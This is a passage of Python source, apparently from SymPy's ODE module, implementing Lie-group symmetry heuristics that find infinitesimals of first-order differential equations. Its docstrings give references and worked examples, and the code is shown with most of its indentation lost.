subfunc = coords.atoms(AppliedUndef)
if subfunc:
for func in subfunc:
coords = coords.subs(func, 0)
return coords
elif coords.is_Pow:
base, expr = coords.as_base_exp()
base = _lie_group_remove(base)
expr = _lie_group_remove(expr)
return base**expr
elif coords.is_Mul:
mulargs = []
coordargs = coords.args
for arg in coordargs:
            if not isinstance(arg, AppliedUndef):
mulargs.append(_lie_group_remove(arg))
return Mul(*mulargs)
return coords
def infinitesimals(eq, func=None, order=None, hint='default', match=None):
r"""
The infinitesimal functions of an ordinary differential equation, `\xi(x,y)`
and `\eta(x,y)`, are the infinitesimals of the Lie group of point transformations
for which the differential equation is invariant. So, the ODE `y'=f(x,y)`
would admit a Lie group `x^*=X(x,y;\varepsilon)=x+\varepsilon\xi(x,y)`,
`y^*=Y(x,y;\varepsilon)=y+\varepsilon\eta(x,y)` such that `(y^*)'=f(x^*, y^*)`.
A change of coordinates, to `r(x,y)` and `s(x,y)`, can be performed so this Lie group
becomes the translation group, `r^*=r` and `s^*=s+\varepsilon`.
They are tangents to the coordinate curves of the new system.
Consider the transformation `(x, y) \to (X, Y)` such that the
differential equation remains invariant. `\xi` and `\eta` are the tangents to
the transformed coordinates `X` and `Y`, at `\varepsilon=0`.
.. math:: \left(\frac{\partial X(x,y;\varepsilon)}{\partial\varepsilon
}\right)|_{\varepsilon=0} = \xi,
\left(\frac{\partial Y(x,y;\varepsilon)}{\partial\varepsilon
}\right)|_{\varepsilon=0} = \eta,
The infinitesimals can be found by solving the following PDE:
>>> from sympy import Function, Eq, pprint
>>> from sympy.abc import x, y
>>> xi, eta, h = map(Function, ['xi', 'eta', 'h'])
>>> h = h(x, y) # dy/dx = h
>>> eta = eta(x, y)
>>> xi = xi(x, y)
>>> genform = Eq(eta.diff(x) + (eta.diff(y) - xi.diff(x))*h
... - (xi.diff(y))*h**2 - xi*(h.diff(x)) - eta*(h.diff(y)), 0)
>>> pprint(genform)
/d d \ d 2 d
|--(eta(x, y)) - --(xi(x, y))|*h(x, y) - eta(x, y)*--(h(x, y)) - h (x, y)*--(x
\dy dx / dy dy
<BLANKLINE>
d d
i(x, y)) - xi(x, y)*--(h(x, y)) + --(eta(x, y)) = 0
dx dx
Solving the above mentioned PDE is not trivial, and can be solved only by
making intelligent assumptions for `\xi` and `\eta` (heuristics). Once an
infinitesimal is found, the attempt to find more heuristics stops. This is done to
optimise the speed of solving the differential equation. If a list of all the
infinitesimals is needed, ``hint`` should be flagged as ``all``, which gives
    the complete list of infinitesimals. If the infinitesimals for a particular
    heuristic are needed, that heuristic's name can be passed as the ``hint``.
Examples
========
>>> from sympy import Function
>>> from sympy.solvers.ode.ode import infinitesimals
>>> from sympy.abc import x
>>> f = Function('f')
>>> eq = f(x).diff(x) - x**2*f(x)
>>> infinitesimals(eq)
[{eta(x, f(x)): exp(x**3/3), xi(x, f(x)): 0}]
References
==========
- Solving differential equations by Symmetry Groups,
John Starrett, pp. 1 - pp. 14
"""
if isinstance(eq, Equality):
eq = eq.lhs - eq.rhs
if not func:
eq, func = _preprocess(eq)
variables = func.args
if len(variables) != 1:
raise ValueError("ODE's have only one independent variable")
else:
x = variables[0]
if not order:
order = ode_order(eq, func)
if order != 1:
raise NotImplementedError("Infinitesimals for only "
"first order ODE's have been implemented")
else:
df = func.diff(x)
# Matching differential equation of the form a*df + b
a = Wild('a', exclude = [df])
b = Wild('b', exclude = [df])
if match: # Used by lie_group hint
h = match['h']
y = match['y']
else:
match = collect(expand(eq), df).match(a*df + b)
if match:
h = -simplify(match[b]/match[a])
else:
try:
sol = solve(eq, df)
except NotImplementedError:
raise NotImplementedError("Infinitesimals for the "
"first order ODE could not be found")
else:
h = sol[0] # Find infinitesimals for one solution
y = Dummy("y")
h = h.subs(func, y)
u = Dummy("u")
hx = h.diff(x)
hy = h.diff(y)
hinv = ((1/h).subs([(x, u), (y, x)])).subs(u, y) # Inverse ODE
match = {'h': h, 'func': func, 'hx': hx, 'hy': hy, 'y': y, 'hinv': hinv}
if hint == 'all':
xieta = []
for heuristic in lie_heuristics:
function = globals()['lie_heuristic_' + heuristic]
inflist = function(match, comp=True)
if inflist:
xieta.extend([inf for inf in inflist if inf not in xieta])
if xieta:
return xieta
else:
raise NotImplementedError("Infinitesimals could not be found for "
"the given ODE")
elif hint == 'default':
for heuristic in lie_heuristics:
function = globals()['lie_heuristic_' + heuristic]
xieta = function(match, comp=False)
if xieta:
return xieta
raise NotImplementedError("Infinitesimals could not be found for"
" the given ODE")
elif hint not in lie_heuristics:
raise ValueError("Heuristic not recognized: " + hint)
else:
function = globals()['lie_heuristic_' + hint]
xieta = function(match, comp=True)
if xieta:
return xieta
else:
raise ValueError("Infinitesimals could not be found using the"
" given heuristic")
def lie_heuristic_abaco1_simple(match, comp=False):
r"""
The first heuristic uses the following four sets of
assumptions on `\xi` and `\eta`
.. math:: \xi = 0, \eta = f(x)
.. math:: \xi = 0, \eta = f(y)
.. math:: \xi = f(x), \eta = 0
.. math:: \xi = f(y), \eta = 0
The success of this heuristic is determined by algebraic factorisation.
For the first assumption `\xi = 0` and `\eta` to be a function of `x`, the PDE
.. math:: \frac{\partial \eta}{\partial x} + (\frac{\partial \eta}{\partial y}
- \frac{\partial \xi}{\partial x})*h
- \frac{\partial \xi}{\partial y}*h^{2}
- \xi*\frac{\partial h}{\partial x} - \eta*\frac{\partial h}{\partial y} = 0
reduces to `f'(x) - f\frac{\partial h}{\partial y} = 0`
If `\frac{\partial h}{\partial y}` is a function of `x`, then this can usually
be integrated easily. A similar idea is applied to the other 3 assumptions as well.
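    For instance, for `\frac{dy}{dx} = x^{2} y` one has `h = x^{2} y` and
    `\frac{\partial h}{\partial y} = x^{2}`, which depends on `x` alone, so the first
    assumption gives `\xi = 0` and `\eta = e^{\int x^{2} \,dx} = e^{x^{3}/3}`, the same
    pair returned by :py:meth:`~sympy.solvers.ode.infinitesimals` for this equation.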
References
==========
    - E.S. Cheb-Terrab, L.G.S. Duarte and L.A.C.P. da Mota, Computer Algebra
Solving of First Order ODEs Using Symmetry Methods, pp. 8
"""
xieta = []
y = match['y']
h = match['h']
func = match['func']
x = func.args[0]
hx = match['hx']
hy = match['hy']
xi = Function('xi')(x, func)
eta = Function('eta')(x, func)
hysym = hy.free_symbols
if y not in hysym:
try:
fx = exp(integrate(hy, x))
except NotImplementedError:
pass
else:
inf = {xi: S.Zero, eta: fx}
if not comp:
return [inf]
if comp and inf not in xieta:
xieta.append(inf)
factor = hy/h
facsym = factor.free_symbols
if x not in facsym:
try:
fy = exp(integrate(factor, y))
except NotImplementedError:
pass
else:
inf = {xi: S.Zero, eta: fy.subs(y, func)}
if not comp:
return [inf]
if comp and inf not in xieta:
xieta.append(inf)
factor = -hx/h
facsym = factor.free_symbols
if y not in facsym:
try:
fx = exp(integrate(factor, x))
except NotImplementedError:
pass
else:
inf = {xi: fx, eta: S.Zero}
if not comp:
return [inf]
if comp and inf not in xieta:
xieta.append(inf)
factor = -hx/(h**2)
facsym = factor.free_symbols
if x not in facsym:
try:
fy = exp(integrate(factor, y))
except NotImplementedError:
pass
else:
inf = {xi: fy.subs(y, func), eta: S.Zero}
if not comp:
return [inf]
if comp and inf not in xieta:
xieta.append(inf)
if xieta:
return xieta
def lie_heuristic_abaco1_product(match, comp=False):
r"""
The second heuristic uses the following two assumptions on `\xi` and `\eta`
.. math:: \eta = 0, \xi = f(x)*g(y)
.. math:: \eta = f(x)*g(y), \xi = 0
The first assumption of this heuristic holds good if
`\frac{1}{h^{2}}\frac{\partial^2}{\partial x \partial y}\log(h)` is
    separable in `x` and `y`. In that case the separated factor containing `x`
    is `f(x)`, and `g(y)` is obtained by
.. math:: e^{\int f\frac{\partial}{\partial x}\left(\frac{1}{f*h}\right)\,dy}
provided `f\frac{\partial}{\partial x}\left(\frac{1}{f*h}\right)` is a function
of `y` only.
The second assumption holds good if `\frac{dy}{dx} = h(x, y)` is rewritten as
    `\frac{dy}{dx} = \frac{1}{h(y, x)}` and the same properties as in the first
    assumption are satisfied. After obtaining `f(x)` and `g(y)`, the coordinates are again
interchanged, to get `\eta` as `f(x)*g(y)`
References
==========
- E.S. Cheb-Terrab, A.D. Roche, Symmetries and First Order
ODE Patterns, pp. 7 - pp. 8
"""
xieta = []
y = match['y']
h = match['h']
hinv = match['hinv']
func = match['func']
x = func.args[0]
xi = Function('xi')(x, func)
eta = Function('eta')(x, func)
inf = separatevars(((log(h).diff(y)).diff(x))/h**2, dict=True, symbols=[x, y])
if inf and inf['coeff']:
fx = inf[x]
gy = simplify(fx*((1/(fx*h)).diff(x)))
gysyms = gy.free_symbols
if x not in gysyms:
gy = exp(integrate(gy, y))
inf = {eta: S.Zero, xi: (fx*gy).subs(y, func)}
if not comp:
return [inf]
if comp and inf not in xieta:
xieta.append(inf)
u1 = Dummy("u1")
inf = separatevars(((log(hinv).diff(y)).diff(x))/hinv**2, dict=True, symbols=[x, y])
if inf and inf['coeff']:
fx = inf[x]
gy = simplify(fx*((1/(fx*hinv)).diff(x)))
gysyms = gy.free_symbols
if x not in gysyms:
gy = exp(integrate(gy, y))
etaval = fx*gy
etaval = (etaval.subs([(x, u1), (y, x)])).subs(u1, y)
inf = {eta: etaval.subs(y, func), xi: S.Zero}
if not comp:
return [inf]
if comp and inf not in xieta:
xieta.append(inf)
if xieta:
return xieta
def lie_heuristic_bivariate(match, comp=False):
r"""
The third heuristic assumes the infinitesimals `\xi` and `\eta`
to be bi-variate polynomials in `x` and `y`. The assumption made here
for the logic below is that `h` is a rational function in `x` and `y`
though that may not be necessary for the infinitesimals to be
bivariate polynomials. The coefficients of the infinitesimals
    are found by substituting them into the PDE and grouping like monomial terms;
    since the resulting equations are linear in these coefficients, the system is
    solved and checked for non-trivial solutions. The degree of the assumed bivariate
    polynomials is increased up to a certain maximum value.
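    For instance, for the autonomous equation `\frac{dy}{dx} = y^{2}` (so `h = y^{2}`,
    `\frac{\partial h}{\partial x} = 0`, `\frac{\partial h}{\partial y} = 2y`) the
    degree-zero ansatz `\xi = 1`, `\eta = 0` already satisfies the determining PDE,
    since every term then contains a derivative of `\xi` or `\eta`, the factor
    `\frac{\partial h}{\partial x}`, or the factor `\eta`.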
References
==========
- Lie Groups and Differential Equations
pp. 327 - pp. 329
"""
h = match['h']
hx = match['hx']
hy = match['hy']
func = match['func']
x = func.args[0]
y = match['y']
xi = Function('xi')(x, func)
eta = Function('eta')(x, func)
if h.is_rational_function():
# The maximum degree that the infinitesimals can take is
# calculated by this technique.
etax, etay, etad, xix, xiy, xid = symbols("etax etay etad xix xiy xid")
ipde = etax + (etay - xix)*h - xiy*h**2 - xid*hx - etad*hy
num, denom = cancel(ipde).as_numer_denom()
deg = Poly(num, x, y).total_degree()
deta = Function('deta')(x, y)
dxi = Function('dxi')(x, y)
ipde = (deta.diff(x) + (deta.diff(y) - dxi.diff(x))*h - (dxi.diff(y))*h**2
- dxi*hx - deta*hy)
xieq = Symbol("xi0")
etaeq = Symbol("eta0")
for i in range(deg + 1):
if i:
xieq += Add(*[
Symbol("xi_" + str(power) + "_" + str(i - power))*x**power*y**(i - power)
for power in range(i + 1)])
etaeq += Add(*[
Symbol("eta_" + str(power) + "_" + str(i - power))*x**power*y**(i - power)
for power in range(i + 1)])
pden, denom = (ipde.subs({dxi: xieq, deta: etaeq}).doit()).as_numer_denom()
pden = expand(pden)
# If the individual terms are monomials, the coefficients
# are grouped
if pden.is_polynomial(x, y) and pden.is_Add:
polyy = Poly(pden, x, y).as_dict()
if polyy:
symset = xieq.free_symbols.union(etaeq.free_symbols) - {x, y}
soldict = solve(polyy.values(), *symset)
if isinstance(soldict, list):
soldict = soldict[0]
if any(soldict.values()):
xired = xieq.subs(soldict)
etared = etaeq.subs(soldict)
# Scaling is done by substituting one for the parameters
# This can be any number except zero.
dict_ = dict((sym, 1) for sym in symset)
inf = {eta: etared.subs(dict_).subs(y, func),
xi: xired.subs(dict_).subs(y, func)}
return [inf]
def lie_heuristic_chi(match, comp=False):
r"""
The aim of the fourth heuristic is to find the function `\chi(x, y)`
    that satisfies the PDE `\frac{\partial \chi}{\partial x} + h\frac{\partial \chi}{\partial y}
    - \frac{\partial h}{\partial y}\chi = 0`.
    This assumes `\chi` to be a bivariate polynomial in `x` and `y`. By intuition,
    `h` should be a rational function in `x` and `y`. The method used here is
    to substitute a general bivariate polynomial for `\chi`, increasing its degree
    until a certain maximum is reached. The coefficients of the polynomial are
    calculated by collecting terms of the same order in `x` and `y`.
After finding `\chi`, the next step is to use `\eta = \xi*h + \chi`, to
determine `\xi` and `\eta`. This can be done by dividing `\chi` by `h`
which would give `-\xi` as the quotient and `\eta` as the remainder.
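    For instance, for `h = y^{2}` the polynomial `\chi = y^{2}` satisfies
    `\frac{\partial \chi}{\partial x} + y^{2}\frac{\partial \chi}{\partial y} - 2y\chi = 0`;
    dividing `\chi` by `h` gives quotient `1` and remainder `0`, that is `\xi = -1`
    and `\eta = 0`.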
References
==========
    - E.S. Cheb-Terrab, L.G.S. Duarte and L.A.C.P. da Mota, Computer Algebra
Solving of First Order ODEs Using Symmetry Methods, pp. 8
"""
h = match['h']
hy = match['hy']
func = match['func']
x = func.args[0]
y = match['y']
xi = Function('xi')(x, func)
eta = Function('eta')(x, func)
if h.is_rational_function():
schi, schix, schiy = symbols("schi, schix, schiy")
cpde = schix + h*schiy - hy*schi
num, denom = cancel(cpde).as_numer_denom()
deg = Poly(num, x, y).total_degree()
chi = Function('chi')(x, y)
chix = chi.diff(x)
chiy = chi.diff(y)
cpde = chix + h*chiy - hy*chi
chieq = Symbol("chi")
for i in range(1, deg + 1):
chieq += Add(*[
Symbol("chi_" + str(power) + "_" + str(i - power))*x**power*y**(i - power)
for power in range(i + 1)])
cnum, cden = cancel(cpde.subs({chi : chieq}).doit()).as_numer_denom()
cnum = expand(cnum)
if cnum.is_polynomial(x, y) and cnum.is_Add:
cpoly = Poly(cnum, x, y).as_dict()
if cpoly:
solsyms = chieq.free_symbols - {x, y}
soldict = solve(cpoly.values(), *solsyms)
if isinstance(soldict, list):
soldict = soldict[0]
if any(soldict.values()):
chieq = chieq.subs(soldict)
dict_ = dict((sym, 1) for sym in solsyms)
chieq = chieq.subs(dict_)
# After finding chi, the main aim is to find out
# eta, xi by the equation eta = xi*h + chi
# One method to set xi, would be rearranging it to
# (eta/h) - xi = (chi/h). This would mean dividing
# chi by h would give -xi as the quotient and eta
# as the remainder. Thanks to Sean Vig for suggesting
# this method.
xic, etac = div(chieq, h)
inf = {eta: etac.subs(y, func), xi: -xic.subs(y, func)}
return [inf]
def lie_heuristic_function_sum(match, comp=False):
r"""
This heuristic uses the following two assumptions on `\xi` and `\eta`
.. math:: \eta = 0, \xi = f(x) + g(y)
.. math:: \eta = f(x) + g(y), \xi = 0
The first assumption of this heuristic holds good if
.. math:: \frac{\partial}{\partial y}[(h\frac{\partial^{2}}{
\partial x^{2}}(h^{-1}))^{-1}]
is separable in `x` and `y`,
    1. The separated factor containing `y` is `\frac{\partial g}{\partial y}`.
    From this `g(y)` can be determined.
    2. The separated factor containing `x` is `f''(x)`.
3. `h\frac{\partial^{2}}{\partial x^{2}}(h^{-1})` equals
`\frac{f''(x)}{f(x) + g(y)}`. From this `f(x)` can be determined.
The second assumption holds good if `\frac{dy}{dx} = h(x, y)` is rewritten as
    `\frac{dy}{dx} = \frac{1}{h(y, x)}` and the same properties as in the first
    assumption are satisfied. After obtaining `f(x)` and `g(y)`, the coordinates
are again interchanged, to get `\eta` as `f(x) + g(y)`.
For both assumptions, the constant factors are separated among `g(y)`
and `f''(x)`, such that `f''(x)` obtained from 3] is the same as that
obtained from 2]. If not possible, then this heuristic fails.
References
==========
- E.S. Cheb-Terrab, A.D. Roche, Symmetries and First Order
ODE Patterns, pp. 7 - pp. 8
"""
xieta = []
h = match['h']
func = match['func']
hinv = match['hinv']
x = func.args[0]
y = match['y']
xi = Function('xi')(x, func)
eta = Function('eta')(x, func)
for odefac in [h, hinv]:
factor = odefac*((1/odefac).diff(x, 2))
sep = separatevars((1/factor).diff(y), dict=True, symbols=[x, y])
if sep and sep['coeff'] and sep[x].has(x) and sep[y].has(y):
k = Dummy("k")
try:
gy = k*integrate(sep[y], y)
except NotImplementedError:
pass
else:
fdd = 1/(k*sep[x]*sep['coeff'])
fx = simplify(fdd/factor - gy)
check = simplify(fx.diff(x, 2) - fdd)
if fx:
if not check:
fx = fx.subs(k, 1)
gy = (gy/k)
else:
sol = solve(check, k)
if sol:
sol = sol[0]
fx = fx.subs(k, sol)
gy = (gy/k)*sol
else:
continue
if odefac == hinv: # Inverse ODE
fx = fx.subs(x, y)
gy = gy.subs(y, x)
etaval = factor_terms(fx + gy)
if etaval.is_Mul:
etaval = Mul(*[arg for arg in etaval.args if arg.has(x, y)])
if odefac == hinv: # Inverse ODE
inf = {eta: etaval.subs(y, func), xi : S.Zero}
else:
inf = {xi: etaval.subs(y, func), eta : S.Zero}
if not comp:
return [inf]
else:
xieta.append(inf)
if xieta:
return xieta
def lie_heuristic_abaco2_similar(match, comp=False):
r"""
This heuristic uses the following two assumptions on `\xi` and `\eta`
.. math:: \eta = g(x), \xi = f(x)
.. math:: \eta = f(y), \xi = g(y)
For the first assumption,
    1. First `\frac{\frac{\partial h}{\partial y}}{\frac{\partial^{2} h}{
    \partial y^{2}}}` is calculated. Let us call this value `A`.
    2. If this is constant, then `h` is matched to the form `A(x) + B(x)e^{
    \frac{y}{C}}`. Then `\frac{e^{-\int \frac{A(x)}{C} \,dx}}{B(x)}` gives `f(x)`
    and `A(x)*f(x)` gives `g(x)`.
    3. Otherwise `\frac{\frac{\partial A}{\partial x}}{\frac{\partial A}{
    \partial y}} = \gamma` is calculated. If
a] `\gamma` is a function of `x` alone
b] `\frac{\gamma\frac{\partial h}{\partial y} - \gamma'(x) - \frac{
\partial h}{\partial x}}{h + \gamma} = G` is a function of `x` alone.
then, `e^{\int G \,dx}` gives `f(x)` and `-\gamma*f(x)` gives `g(x)`
The second assumption holds good if `\frac{dy}{dx} = h(x, y)` is rewritten as
    `\frac{dy}{dx} = \frac{1}{h(y, x)}` and the same properties as in the first
    assumption are satisfied. After obtaining `f(x)` and `g(x)`, the coordinates are again
interchanged, to get `\xi` as `f(x^*)` and `\eta` as `g(y^*)`
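    For the first assumption, for instance, `h = x + e^{y}` matches with `A(x) = x`,
    `B(x) = 1`, `C = 1`, giving `f(x) = e^{-x^{2}/2}` and `g(x) = x e^{-x^{2}/2}`, i.e.
    `\xi = e^{-x^{2}/2}`, `\eta = x e^{-x^{2}/2}`.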
References
==========
- E.S. Cheb-Terrab, A.D. Roche, Symmetries and First Order
ODE Patterns, pp. 10 - pp. 12
"""
h = match['h']
hx = match['hx']
hy = match['hy']
func = match['func']
hinv = match['hinv']
x = func.args[0]
y = match['y']
xi = Function('xi')(x, func)
eta = Function('eta')(x, func)
factor = cancel(h.diff(y)/h.diff(y, 2))
factorx = factor.diff(x)
factory = factor.diff(y)
if not factor.has(x) and not factor.has(y):
A = Wild('A', exclude=[y])
B = Wild('B', exclude=[y])
C = Wild('C', exclude=[x, y])
match = h.match(A + B*exp(y/C))
try:
            tau = exp(-integrate(match[A]/match[C], x))/match[B]
except NotImplementedError:
pass
else:
gx = match[A]*tau
return [{xi: tau, eta: gx}]
else:
gamma = cancel(factorx/factory)
if not gamma.has(y):
tauint = cancel((gamma*hy - gamma.diff(x) - hx)/(h + gamma))
if not tauint.has(y):
try:
tau = exp(integrate(tauint, x))
except NotImplementedError:
pass
else:
gx = -tau*gamma
return [{xi: tau, eta: gx}]
factor = cancel(hinv.diff(y)/hinv.diff(y, 2))
factorx = factor.diff(x)
factory = factor.diff(y)
if not factor.has(x) and not factor.has(y):
A = Wild('A', exclude=[y])
B = Wild('B', exclude=[y])
C = Wild('C', exclude=[x, y])
match = h.match(A + B*exp(y/C))
try:
            tau = exp(-integrate(match[A]/match[C], x))/match[B]
except NotImplementedError:
pass
else:
gx = match[A]*tau
return [{eta: tau.subs(x, func), xi: gx.subs(x, func)}]
else:
gamma = cancel(factorx/factory)
if not gamma.has(y):
tauint = cancel((gamma*hinv.diff(y) - gamma.diff(x) - hinv.diff(x))/(
hinv + gamma))
if not tauint.has(y):
try:
tau = exp(integrate(tauint, x))
except NotImplementedError:
pass
else:
gx = -tau*gamma
return [{eta: tau.subs(x, func), xi: gx.subs(x, func)}]
def lie_heuristic_abaco2_unique_unknown(match, comp=False):
r"""
This heuristic assumes the presence of unknown functions or known functions
with non-integer powers.
    1. A list of all functions and non-integer powers containing `x` and `y` is made.
    2. Loop over each element `f` in the list, find `\frac{\frac{\partial f}{\partial y}}{
    \frac{\partial f}{\partial x}} = R`
If it is separable in `x` and `y`, let `X` be the factors containing `x`. Then
a] Check if `\xi = X` and `\eta = -\frac{X}{R}` satisfy the PDE. If yes, then return
`\xi` and `\eta`
b] Check if `\xi = \frac{-R}{X}` and `\eta = -\frac{1}{X}` satisfy the PDE.
If yes, then return `\xi` and `\eta`
If not, then check if
a] :math:`\xi = -R,\eta = 1`
b] :math:`\xi = 1, \eta = -\frac{1}{R}`
are solutions.
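    For instance, for `h = \sqrt{x + y}` the only such object is `f = (x + y)^{1/2}`,
    giving `R = 1` and `X = 1`, and the pair `\xi = 1`, `\eta = -1` (a translation in
    the direction `(1, -1)`) satisfies the PDE.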
References
==========
- E.S. Cheb-Terrab, A.D. Roche, Symmetries and First Order
ODE Patterns, pp. 10 - pp. 12
"""
h = match['h']
hx = match['hx']
hy = match['hy']
func = match['func']
x = func.args[0]
y = match['y']
xi = Function('xi')(x, func)
eta = Function('eta')(x, func)
funclist = []
for atom in h.atoms(Pow):
base, exp = atom.as_base_exp()
if base.has(x) and base.has(y):
if not exp.is_Integer:
funclist.append(atom)
for function in h.atoms(AppliedUndef):
syms = function.free_symbols
if x in syms and y in syms:
funclist.append(function)
for f in funclist:
frac = cancel(f.diff(y)/f.diff(x))
sep = separatevars(frac, dict=True, symbols=[x, y])
if sep and sep['coeff']:
xitry1 = sep[x]
etatry1 = -1/(sep[y]*sep['coeff'])
pde1 = etatry1.diff(y)*h - xitry1.diff(x)*h - xitry1*hx - etatry1*hy
if not simplify(pde1):
return [{xi: xitry1, eta: etatry1.subs(y, func)}]
xitry2 = 1/etatry1
etatry2 = 1/xitry1
pde2 = etatry2.diff(x) - (xitry2.diff(y))*h**2 - xitry2*hx - etatry2*hy
if not simplify(expand(pde2)):
return [{xi: xitry2.subs(y, func), eta: etatry2}]
else:
etatry = -1/frac
pde = etatry.diff(x) + etatry.diff(y)*h - hx - etatry*hy
if not simplify(pde):
return [{xi: S.One, eta: etatry.subs(y, func)}]
xitry = -frac
pde = -xitry.diff(x)*h -xitry.diff(y)*h**2 - xitry*hx -hy
if not simplify(expand(pde)):
return [{xi: xitry.subs(y, func), eta: S.One}]
def lie_heuristic_abaco2_unique_general(match, comp=False):
r"""
    This heuristic finds infinitesimals of the form `\eta = f(x)`, `\xi = g(y)`,
    without making any assumptions on `h`.
The complete sequence of steps is given in the paper mentioned below.
References
==========
- E.S. Cheb-Terrab, A.D. Roche, Symmetries and First Order
ODE Patterns, pp. 10 - pp. 12
"""
hx = match['hx']
hy = match['hy']
func = match['func']
x = func.args[0]
y = match['y']
xi = Function('xi')(x, func)
eta = Function('eta')(x, func)
A = hx.diff(y)
B = hy.diff(y) + hy**2
C = hx.diff(x) - hx**2
if not (A and B and C):
return
Ax = A.diff(x)
Ay = A.diff(y)
Axy = Ax.diff(y)
Axx = Ax.diff(x)
Ayy = Ay.diff(y)
D = simplify(2*Axy + hx*Ay - Ax*hy + (hx*hy + 2*A)*A)*A - 3*Ax*Ay
if not D:
E1 = simplify(3*Ax**2 + ((hx**2 + 2*C)*A - 2*Axx)*A)
if E1:
E2 = simplify((2*Ayy + (2*B - hy**2)*A)*A - 3*Ay**2)
if not E2:
E3 = simplify(
E1*((28*Ax + 4*hx*A)*A**3 - E1*(hy*A + Ay)) - E1.diff(x)*8*A**4)
if not E3:
etaval = cancel((4*A**3*(Ax - hx*A) + E1*(hy*A - Ay))/(S(2)*A*E1))
if x not in etaval:
try:
etaval = exp(integrate(etaval, y))
except NotImplementedError:
pass
else:
xival = -4*A**3*etaval/E1
if y not in xival:
return [{xi: xival, eta: etaval.subs(y, func)}]
else:
E1 = simplify((2*Ayy + (2*B - hy**2)*A)*A - 3*Ay**2)
if E1:
E2 = simplify(
4*A**3*D - D**2 + E1*((2*Axx - (hx**2 + 2*C)*A)*A - 3*Ax**2))
if not E2:
E3 = simplify(
-(A*D)*E1.diff(y) + ((E1.diff(x) - hy*D)*A + 3*Ay*D +
(A*hx - 3*Ax)*E1)*E1)
if not E3:
etaval = cancel(((A*hx - Ax)*E1 - (Ay + A*hy)*D)/(S(2)*A*D))
if x not in etaval:
try:
etaval = exp(integrate(etaval, y))
except NotImplementedError:
pass
else:
xival = -E1*etaval/D
if y not in xival:
return [{xi: xival, eta: etaval.subs(y, func)}]
def lie_heuristic_linear(match, comp=False):
r"""
This heuristic assumes
    1. `\xi = ax + by + c` and
    2. `\eta = fx + gy + k`
    After substituting these assumptions into the determining PDE, it
    reduces to
    .. math:: f + (g - a)h - bh^{2} - (ax + by + c)\frac{\partial h}{\partial x}
                  - (fx + gy + k)\frac{\partial h}{\partial y} = 0
    Solving the reduced PDE directly, for instance by the method of characteristics,
    is impractical. Instead, similar terms are grouped and the resulting system of
    linear equations is solved. The difference from the bivariate heuristic is that
    `h` need not be a rational function in this case.
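    For instance, for `\frac{dy}{dx} = x` (so `h = x`), grouping the powers of `x` and
    `y` in the reduced PDE forces `b = 0`, `f = c` and `g = 2a`, so for any choice of the
    remaining constants `\xi = ax + c`, `\eta = cx + 2ay + k` solves the determining
    equation.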
References
==========
- E.S. Cheb-Terrab, A.D. Roche, Symmetries and First Order
ODE Patterns, pp. 10 - pp. 12
"""
h = match['h']
hx = match['hx']
hy = match['hy']
func = match['func']
x = func.args[0]
y = match['y']
xi = Function('xi')(x, func)
eta = Function('eta')(x, func)
coeffdict = {}
symbols = numbered_symbols("c", cls=Dummy)
symlist = [next(symbols) for _ in islice(symbols, 6)]
C0, C1, C2, C3, C4, C5 = symlist
pde = C3 + (C4 - C0)*h - (C0*x + C1*y + C2)*hx - (C3*x + C4*y + C5)*hy - C1*h**2
pde, denom = pde.as_numer_denom()
pde = powsimp(expand(pde))
if pde.is_Add:
terms = pde.args
for term in terms:
if term.is_Mul:
rem = Mul(*[m for m in term.args if not m.has(x, y)])
xypart = term/rem
if xypart not in coeffdict:
coeffdict[xypart] = rem
else:
coeffdict[xypart] += rem
else:
if term not in coeffdict:
coeffdict[term] = S.One
else:
coeffdict[term] += S.One
sollist = coeffdict.values()
soldict = solve(sollist, symlist)
if soldict:
if isinstance(soldict, list):
soldict = soldict[0]
subval = soldict.values()
if any(t for t in subval):
onedict = dict(zip(symlist, [1]*6))
xival = C0*x + C1*func + C2
etaval = C3*x + C4*func + C5
xival = xival.subs(soldict)
etaval = etaval.subs(soldict)
xival = xival.subs(onedict)
etaval = etaval.subs(onedict)
return [{xi: xival, eta: etaval}]
def sysode_linear_2eq_order1(match_):
x = match_['func'][0].func
y = match_['func'][1].func
func = match_['func']
fc = match_['func_coeff']
eq = match_['eq']
r = dict()
t = list(list(eq[0].atoms(Derivative))[0].atoms(Symbol))[0]
for i in range(2):
eqs = 0
for terms in Add.make_args(eq[i]):
eqs += terms/fc[i,func[i],1]
eq[i] = eqs
# for equations Eq(a1*diff(x(t),t), a*x(t) + b*y(t) + k1)
    # and Eq(a2*diff(y(t),t), c*x(t) + d*y(t) + k2)
r['a'] = -fc[0,x(t),0]/fc[0,x(t),1]
r['c'] = -fc[1,x(t),0]/fc[1,y(t),1]
r['b'] = -fc[0,y(t),0]/fc[0,x(t),1]
r['d'] = -fc[1,y(t),0]/fc[1,y(t),1]
forcing = [S.Zero,S.Zero]
for i in range(2):
for j in Add.make_args(eq[i]):
if not j.has(x(t), y(t)):
forcing[i] += j
if not (forcing[0].has(t) or forcing[1].has(t)):
r['k1'] = forcing[0]
r['k2'] = forcing[1]
else:
raise NotImplementedError("Only homogeneous problems are supported" +
" (and constant inhomogeneity)")
if match_['type_of_equation'] == 'type6':
sol = _linear_2eq_order1_type6(x, y, t, r, eq)
if match_['type_of_equation'] == 'type7':
sol = _linear_2eq_order1_type7(x, y, t, r, eq)
return sol
def _linear_2eq_order1_type6(x, y, t, r, eq):
r"""
    The equations of this type of ODE are
.. math:: x' = f(t) x + g(t) y
.. math:: y' = a [f(t) + a h(t)] x + a [g(t) - h(t)] y
This is solved by first multiplying the first equation by `-a` and adding
it to the second equation to obtain
.. math:: y' - a x' = -a h(t) (y - a x)
Setting `U = y - ax` and integrating the equation we arrive at
.. math:: y - ax = C_1 e^{-a \int h(t) \,dt}
    and substituting the value of `y` into the first equation gives rise to a first-order ODE. After solving for
    `x`, we can obtain `y` by substituting the value of `x` into the second equation.
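    For instance, with `f(t) = 1`, `g(t) = t`, `h(t) = 1` and `a = 1` the system is
    `x' = x + t y`, `y' = 2 x + (t - 1) y`; here `y - x = C_1 e^{-t}`, and substituting this
    into the first equation leaves the single linear ODE `x' = (1 + t) x + C_1 t e^{-t}`.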
"""
C1, C2, C3, C4 = get_numbered_constants(eq, num=4)
p = 0
q = 0
p1 = cancel(r['c']/cancel(r['c']/r['d']).as_numer_denom()[0])
p2 = cancel(r['a']/cancel(r['a']/r['b']).as_numer_denom()[0])
for n, i in enumerate([p1, p2]):
for j in Mul.make_args(collect_const(i)):
if not j.has(t):
q = j
if q!=0 and n==0:
if ((r['c']/j - r['a'])/(r['b'] - r['d']/j)) == j:
p = 1
s = j
break
if q!=0 and n==1:
if ((r['a']/j - r['c'])/(r['d'] - r['b']/j)) == j:
p = 2
s = j
break
if p == 1:
